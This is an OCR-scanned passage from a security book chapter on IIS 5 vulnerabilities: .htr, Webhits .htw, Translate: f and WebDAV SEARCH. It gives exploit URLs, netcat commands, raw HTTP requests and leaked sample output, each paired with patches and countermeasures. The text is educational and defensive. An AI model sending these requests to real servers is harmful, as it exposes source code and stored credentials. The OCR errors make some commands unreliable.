One additional point about this recommendation is the use of server-side tags within 
ASP code. The .htr bug carmot read portions of Active Server files delimited by the <% 
%> tags, which are often used to denote portions of the file processed server-side. 
Microsoft cites the following example in its security bulletin on .htr. 

Say an ASP file has the following content, with server-side tags in the indicated locations: 

<b>Some HTML code</b> 

"6 

/*Some ASP/HTR code*/ 

var objConn = new ActiveXOb ject ( "Foo .bar" ) ; 

%> 

<I>other html code</I> 
other code. 

The information that would be returned to an + .htr request for this ASP file would be 
as follows: 

<b>Some HTML code</b> 

<I>other html code</I> 
other code. 

Note, all data included between the server-side tags is stripped out. Thus, a good idea 
is to train the Web development team to use these tags when they explicitly don't want 
script data to be read on the client. In addition to providing defense against any future is- 
sues like .htr, this also gets them to constantly consider the possibility that their script 
source code could fall into the wrong hands. 

Of course, it's also wise is to prevent the occurrence of the flaw itself. A simple way to 
eliminate many of the potential hazards lurking in the many ISAPl DLLs that ship with 
IIS 5 is to disable the application mapping for any that aren't used. In the case of +.htr, 
that file extension maps to ism.dll, which handles Web-based password reset. HTR is a 
scripting technology delivered as part of IIS 2 but was never widely adopted, largely be- 
cause ASP (introduced in IIS 4) proved more superior and flexible. If your site isn't using 
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this functionality (and most don't), simply remove the application mapping for .htr to 
ism.dll in the IIS 5 Admin Tool (iis.msc). 

Microsoft explicitly advises that the most appropriate way to eliminate these vulnera- 
bilities is to remove the script mapping for .htr, as discussed in the previous section on the 
IPP buffer overflow (see Figure 10-1). However, if your application relies on .htr-based 
password reset, then removing the application mapping for .htr isn't a viable option in 
the short term. In this case, obtain and apply the patch for this issue from Microsoft Security 
Bulletin MSOl-004 (note, this bulletin and related patches supersedes previously released 
fixes for this issue discussed in MSOO-031 and MSOO-044). 




Make sure to apply the most recent patch for .htr. Previous patches were found to be vulnerable to vari- 
ants of the original attack (%3F-r.htr). At press time, the most recent patch is MS01-004. 



This patch will be included in Windows 2000 Service Pack 3, so make sure to get the 
Hotfix if you aren't miming SP3 (which wasn't even available at press time). In the long 
term, write an ASP file to replace the .htr functionality if possible, and then remove the 
script mapping. As you have seen, additional vulnerabilities may be lurking in the 
ism.dll ISAPI extension. This patch is included in the latest IIS rollup Hotfix package, 
MSOl-026. 

If you're using Web-based password administration, strengthening the permissions 
on the / scripts /iisadmin so only Administrators can access it is also wise. 

^ ' ^ebhits 



Popularity: 


9 


Simplicity: 


9 


Impact: 


4 


Risk Rating: 


8 



Many sites leverage Microsoft Indexing Services to extend the functionality of fheir 
Web servers. This is insfalled by defaulf on Windows 2000 buf isn't set to start up auto- 
matically at boot time unless explicitly configured to do so. When active. Indexing Ser- 
vices extends IIS with an ISAPI DLL called webhits.dll. Webhits lends "hit highlighting" 
functionality to Index Server, which shows the exact portions of a documenf thaf safisfy 
an Index Server query. Webhifs is invoked by requesting .htw files, and several vulnera- 
bilities are associafed wifh Webhifs fimcfionality. Each of fhem was discovered by David 
Lifchfield while working af Cerberus Information Security. 

T The first .htw attack works by using an existing .htw sample file fo view fhe 
source of other files, even fhose outside of Webroof. These samples are 
optionally installed on IIS 4, not 5. A sample attack might look like this: 

http : / /victim. com/ iis samples/ is samples/ oop/qfullhit .htw? 

CiWebHitsFile=/ . . / . . /winnt /repair/ setup . log&CiRestriction=none 
&CiHiliteType=Full 
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■ The second exploit fakes the presence of an .htw file by using a technique 
called "buffer truncation." This version works against IIS 4 and IIS 5 (but 
cannot break out of Webroot on IIS 5) and is discussed in more detail shortly. 

▲ A third technique requests a nonexistent .htw file and appends a single %20 fo 
fhe file targeted for source revelation to trip up Webhits. This attack cannot read 
files outside of Webroot but can reveal source code. It only works against IIS 4. 
An example URL would look something like this: 

http : / /victim. com/ null .htw?CiWebHitsFile=/default . asp%20 
&CiRestriction=none&CiHiliteType=Full . 

Because the first attack relies on optionally available components and the third attack 
doesn't work against IIS 5, we focus on the second. 

Buffer truncation works by appending a valid file request with a large number of 
spaces (%20's) and a trailing .htw. The .htw extension triggers webhits.dll, but the %20's 
force the .htw out of the buffer and Webhits processes the valid filename (Windows 
NT/2000 ignores trailing spaces in filenames). The trick is positioning the trailing .htw just 
at the edge of the buffer, which can be variable depending on what valid filename is being 
requested. Fortunately, a freely available tool called iiscat exists that creates the appropriate 
buffer for every situation. Let's walk through how an attack would be launched. 

You've already seen how the Webhits syntax looks: 

GET /f ile . htw? CiWebHitsFile=/ default . asp&CiRestriction=none&CiHiliteType=Full 

You want to insert a valid filename in place of file.htw and append a buffer of %20s and a 
final .htw, so the .htw gets trimmed off when processed by webhits.dll. Let's use the de- 
fault Under Construction file named iisstart.asp, which, by defaulf, is present in the 
Webroot directory of IIS 5. First, use iiscat to generate your request with the appropriate 
buffer and the file you want to target for source revelation. Note, the length of the buffer 
varies according to the length of the initial filename requested. 

C:\>iiscat /exairS/siteadmin/default . asp /iisstart.asp 

GET /iisstart . asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 
0%20%20%20%20%20%20%20%20 [total of 221 %20's] %20%20%20%20%20%20%20%20%20 

%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20. htw?CiWebHitsFile=/exair5/site 
admin/def ault . asp&CiRestriction=noneSiCiHiliteType=Full HTTP/1 . 0 

Although we've shown iiscat's output to standard out here, piping it directly through 
a netcat cormection to the target server is easier, like so: 

C:\>iiscat /exairS/siteadmin/default . asp /iisstart.asp 1 nc -w victim.com 80 

victim.com [192.168.12.222] 80 (http) open 
HTTP/ 1.0 200 OK 
Content-Type : text/html 
[source of iisstart.asp] 

<%0LANGUAGE = &quot ; VBSCRIPT&quot ; %> 

<%RESPONSE .BUFFER = TRUE%> 

<! — WARNING! 
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Please do not alter this file. It may be replaced if you upgrade your 
web server. 

If you want to use it as a template, we recommend renaming it, and modifying 
the new file. 

Thanks . — > 

[etc. ] 

<HTMLXHEAD> 

<title id=titletext>Under Construction</title> 

[HTML body of iistart.asp] 

</HTML> 

[source of /exairS/siteadmin/default . asp] 

Exploration Air Site Administration 

Please fill out this form and click on the Save button to update the site’s 
security parameters . 

<BR>>   Allow Anonymous<BR> 

Enables/Disables Windows NT Integrated Authentication for Employee Benefits 
<BR><BR>>   SSL Support <BR> 

Enables/Disables Secure Sockets Layer (SSL) Encryption for Frequent Flyer Club 
<BR><BR>>   Client Certificate Support<BR> 

Enables/Disables X.509 Client Certificate Authentication for Frequent Flyer Club. 
<BRXBR> 

<BR>Sorry, you do not have administrative privileges Therefore, you can 
not edit the site's security settings. 

Copyright ©1998 Microsoft Corporation. All Rights Reserved. 

Terms of Use</B0DYX/HTML> 
sent 828, rcvd 3491: NOTSOCK 

Note, the output from this attack contains the source of fhe initial file requesf, iisstart.asp, 
and then the source of the Webhits-targeted hie, /exairS/siteadmin/default.asp (even 
though we don't have privileges to execute it). We've edited the output signihcantly and 
added some text to highlight these salient points. Once again, if sensihve data is contained in 
the source code of eifher of these files, it's now in the hands of the intruder. 

Q Webhits Countermeasures 



Vendor Bulletin: 


MSOO-006 


Bugtraq ID: 


1084 


Fixed in SP: 


1 


Log Signature: 


Y 



Do we sound like a broken record yet? 

T Ensure that no private data appears in the source of any scripf-related files. 

■ Remove fhe application mapping for .hfw files (as explained under the 
countermeasures for fhe IPP buffer overhow). 

▲ Gef fhe Hoffix from MSOO-006. This patch is included in Windows 2000 Service 
Pack 1, so if you're rurming SPl, you're OK. 
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And, of course, turn off Index Server if it isn't being used. To do this, use the Services 
console (services. mmc) and select Properties of the Indexing Service, set Startup to Man- 
ual, and stop the service. 



^Translate: f” 



Popularity: 


9 


Simplicity: 


9 


Impact: 


4 


Risk Rating: 


8 



The Translate: f vulnerability, identified by Daniel Docekal, is exploited by triggering 
another IIS 5 ISAPI DLL, httpext.dll, which implements Web Distributed Authoring and 
Versioning (WebDAV, RFC 2518) on IIS 5. WebDAV is a Microsoft-backed standard that 
specifies how remote authors can edit and manage Web server content via HTTP. This 
concept sounds scary enough in and of itself, and Translate: f is probably only a harbinger 
of more troubles to come from this powerful, but potentially easily abused, technology. 

The Translate: f exploit achieves the same effect, but operates a bit differently than 
+.htr — instead of a file extension triggering the ISAPI functionality, a specific HTTP 
header does the trick. The Translate: f header signals the WebDAV DLL to handle the re- 
quest and a trailing backslash to the file request causes a processing error, so it sends the 
request directly to the underlying OS (either NT or Windows 2000). NT/2000 happily re- 
turns the file to the attacker's system rather than executing it on the server, as would be 
appropriate. An example of such a request is shown next. Note the trailing backslash after 
GET global.asa and the Translate: f in the HTTP header: 

GET /global. asa\ HTTP/1.0 

Translate: f 

[CRLF] 

[CRLF] 

By redirecting a text file containing this text (call it transf.txt) through a netcat cormection 
to a vulnerable server, as shown next, the source code of the global.asa file is displayed on 
standard out: 

C:\>nc -w www.victim.com 80 < transf.txt 

www.victim.com [192.168.2.41] 80 (http) open 

HTTP/1.1 200 OK 

Server: Microsoft-IIS/5 . 0 

Date: Wed, 23 Aug 2000 06:06:58 GMT 

Content-Type : application/ octet-stream 

Content-Length: 2790 

ETag: "0448299fcd6bfl :bea" 

Last-Modified: Thu, 15 Jun 2000 19:04:30 GMT 
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Accept-Ranges : bytes 
Cache-Control: no-cache 

<!— Copyright 1999-2000 bigCompany.com — > 

<object RUNAT=Server SCOPE=Session ID=fixit PROGID="Bigco . object "></object> 

( "ConnectionText" ) = "DSN=Phone; UID=superman; Password=test; " 

( "ConnectionText" ) = "DSN=Backend; UID=superman; PWD=test; " 

( "LDAPServer " ) = "LDAP : //Idap . bigco . com: 389" 

( "LDAPUserlD" ) = "cn=Admin" 

("LDAPPwd") = "password" 

As you can see from this example, the attacker who pulled down this particular ASA file 
has gained passwords for multiple back-end servers, including an LDAP system. 

Canned Perl exploit scripts that simplify the preceding netcat-based exploit are available 
on the Internet (we used trans.pl by Roelof Temmingh and srcgrab.pl by Smiler). 

Q “Translate: f” Countermeasures 



Vendor Bulletin: 


MSOO-058 


Bugtraq ID: 


1578 


Fixed in SP: 


1 


Log Signature: 


N 



As always, the best way to address the risk posed by Translate: f and other source 
code revelation-tj^e vulnerabilities is simply to assume any server-side executable files 
on IIS are visible to Internet users and never to store sensitive information in these hies. 

Because this isn't invoked by a specific hie request, removing applicahon mappings isn't 
relevant here. You could delete httpext.dll, but the effect of this on core IIS 5 functionality is 
unknown. Certainly if you intend to use WebDAV functionality, it will be deleterious. 

Of course, you should also obtain the patch that fixes this specific vulnerability from 
Microsoft Security Bulletin MSOO-058 (http://www.microsoft.com/technet/security/ 
bullehn/MS00-058.asp). This patch is included in Windows 2000 Service Pack 1 so, if you're 
rurming SPl, you're OK. 

^ "WebDAV SEARCH Directory Listing 



Popularity: 


5 


Simplicity: 


7 


Impact: 


1 


Risk Rating: 


4 



The WebDAV SEARCH vulnerability was discovered by David Litchfield in October 
2000. The WebDAV ISAPI DLL, httext.dll, is at the root of this vulnerability as well, al- 
though it isn't as serious as Translate: f. If the Index Service is rurming and read access is 
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granted to the directory in question, a WebDAV SEARCH request can obtain a directory 
listing of the Webroot directory and every subdirectory. Although this might not seem 
earth-shattering at first, recall our example from the Web Application hacking discussion 
at the outset of this chapter — attackers might be able to discover private files or identify 
.inc files used in ASP applications that can be directly downloaded in a browser. The 
HTTP request S5mtax that exploits the vulnerability is shown next: 

SEARCH / HTTP/ 1.1 
Host : 127.0.0.1 
Content-Type: text/xml 
Content-Length: 133 



<?xml version=" 1 . 0 " ?> 

<g : searchrequest xmlns : g="DAV : "> 

<g : sql> 

Select "DAV : displayname " from scope () 

</g : sql> 

</g : searchrequest> 

Redirecting a file with this input to a netcat connection to a target server generates an 
XML-ified directory listing of fhe Webroot directory and every subdirectory. It's best to 
redirect the output to a .xml file, edif out the HTTP headers using a text editor, and then 
open the remaining raw XML in Internet Explorer or another Web browser that renders 
XML. Here's what the redirection command might look like (webdav.txt contains the in- 
put previously shown, and output. xml is an arbitrary filename chosen for our oufpuf): 

C:\>nc -w victim.com 80 < webdav.txt > output. xml 

After editing out extraneous HTTP headers from output.xml, and then opening it in 
Internet Explorer, we see the directory listing, as shown in Eigure 10-6. We've only shown 
two of the files located in the Webroot directory in this figure, but the entire output.xml 
file reveals the names of all subdirectories and files under the Webroot. 

Q WebDAV SEARCH Countermeasures 



Vendor Bulletin: 


KB Q272079 


Bugtraq ID: 


1756 


Fixed in SP: 


NA 


Log Signature: 


y 



Microsoft has published KB article Q272079 that details the following countermea- 
sures for WebDAV SEARCH queries: 

T If you aren't using Index Server (for example, you don't have content on your 
Web site you want to have searched), disable or uninstall the service. 
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Figure 1 0-6. Output from a WebDAV SEARCH request shows a directory listing of the Webroot 
and all subdirectories on the target IIS 5 server. 



▲ If you must enable Index Server, configure directories that contain sensitive 
information to disable the Index This Resource option on the appropriate tab 
(for example, select Properties of the Scripts virtual directory within the IIS 
Admin tool, go to the Virtual Directory tab, and uncheck Index This Resource). 

And, once again, we remind readers to rename their .inc files to .asp so, even if some- 
one can identify the filenames using WebDAV SEARCH, they won't be able to download 
them to their browsers. 

Microsoft posted a Knowledge Base article detailing how to disable WebDAV with- 
out deleting the httpext DLL, and then removed it from their site. The article number was 
Q241520, and, in the following, we list the instructions for disabling and reenabling 
WebDAV, printed verbatim from the article. 

Steps to Disable WebDAV for an Entire IIS 5.0 Web Server 

1. Open a command-prompt session. 

2. Stop the IIS services by typing the following command, and then pressing 
ENTER: IISRESET /STOP 
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3. Set ACLs on the Httpext.dll file to everyone no access. 

4. Change the directory to your %SystemRoot%\System32\Inetsrv folder. 

5. Open a command-prompt session and type: CACLS httpext.dll /D Everyone 

6. Restart the IIS services by t5^ing the following command, and then 
pressing ENTER: 

IISRESET /START 

Steps to Reenable WebDAV 

1. Open Windows Explorer. 

2. Go to your %SystemRoot%\System32\Inetsrv folder. 

3. Righf-click your Hffpexf.dll file, and fhen click Properties on the pop-up menu. 

4. Click the Security tab. 

5. Select Everyone, and then click Remove. 

6. Select the Allow inheritable permissions from parenf fo propagate to this object 
check box, and then click Apply. 

7. Click OK to exit the Properties dialog box. 

Searches for Q241520 fumed up no resulf as fhis book went to press so, apparently, 
Microsoft pulled this article from ifs supporf Web sife. We're unsure as to why this was 
done and, furthermore, we don't know whether disabling WebDAV in this marmer is a 
supported option on Windows 2000. 



